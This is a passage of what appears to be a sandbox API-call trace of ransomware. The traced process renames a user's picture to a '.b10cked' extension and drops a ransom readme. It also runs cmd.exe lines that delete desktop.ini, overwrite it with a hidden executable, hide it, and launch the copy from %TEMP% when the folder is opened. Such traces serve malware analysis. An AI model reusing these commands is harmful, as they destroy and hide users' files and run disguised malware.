lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.964] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19575319800) returned 1 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xb764 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xb27c [0138.966] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xb764 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xb764 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.967] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5bb1, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5bb1, lpOverlapped=0x0) returned 1 [0138.968] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.968] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5bb1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5bb1, lpOverlapped=0x0) returned 1 [0138.968] SetFilePointer (in: hFile=0x114, lDistanceToMove=-23473, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5bb3 [0138.968] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5bb1, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5bb1, lpOverlapped=0x0) returned 1 [0138.968] SetFilePointer (in: hFile=0x114, lDistanceToMove=-23473, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5bb3 [0138.968] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, 
nNumberOfBytesToWrite=0x5bb1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5bb1, lpOverlapped=0x0) returned 1 [0138.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="aR0_1pZCSZwjfY.jpg", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0138.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="aR0_1pZCSZwjfY.jpg", cchWideChar=18, lpMultiByteStr=0x13288fc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aR0_1pZCSZwjfY.jpg", lpUsedDefaultChar=0x0) returned 18 [0138.976] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xb764 [0138.976] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.977] CloseHandle (hObject=0x114) returned 1 [0138.978] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG") returned 0x26 [0138.978] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0138.978] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, 
lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\AR0_1P~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xfa4, dwThreadId=0xefc)) returned 1 [0138.987] CloseHandle (hObject=0x110) returned 1 [0138.987] CloseHandle (hObject=0x114) returned 1 [0138.987] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0138.987] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", cchLength=0x2d | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\") returned 0x2d [0138.987] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\", cchCount2=45) returned 3 [0138.987] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0138.987] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.987] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0138.987] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0138.987] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 
| out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0138.988] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0138.988] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0138.988] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0138.988] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0138.988] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xfa0, dwThreadId=0xf94)) returned 1 [0138.995] CloseHandle (hObject=0x110) returned 1 [0138.995] CloseHandle (hObject=0x114) returned 1 [0138.995] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\bl0cked-readme.rtf")) returned 0xffffffff [0138.995] GetLastError () returned 0x2 [0138.995] 
CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0138.999] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\bl0cked-readme.rtf")) returned 0x20 [0138.999] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.999] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.999] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.999] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.999] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0139.000] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0139.000] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0139.000] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0139.000] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q 
\"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0139.000] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0139.000] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures") returned 0x19 [0139.000] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x122 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\PICTURES\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\PICTURES\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\PICTURES\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\PICTURES\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x122 [0139.000] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0139.000] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"", lpProcessAttributes=0x0, 
lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xf90, dwThreadId=0xf98)) returned 1 [0139.244] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0143.267] CloseHandle (hObject=0x114) returned 1 [0143.267] CloseHandle (hObject=0x110) returned 1 [0143.267] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0143.268] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0143.268] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0143.268] GetTickCount () returned 0x2cc91 [0143.268] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20005705189) returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x58\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, 
cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x66\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x55\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x50\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6b\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x44\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0143.268] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0143.268] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" 
> \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0143.268] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0143.268] CharUpperBuffW (in: lpsz="explorer.exe \"Pictures\" & type \"Pictures\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x61 | out: lpsz="EXPLORER.EXE \"PICTURES\" & TYPE \"PICTURES\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x61 [0143.268] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0143.268] CharUpperBuffW (in: lpsz="explorer.exe \"Pictures\" & type \"Pictures\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x62 | out: lpsz="EXPLORER.EXE \"PICTURES\" & TYPE \"PICTURES\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x62 [0143.268] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0143.268] CoInitialize (pvReserved=0x0) returned 0x0 [0143.269] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, 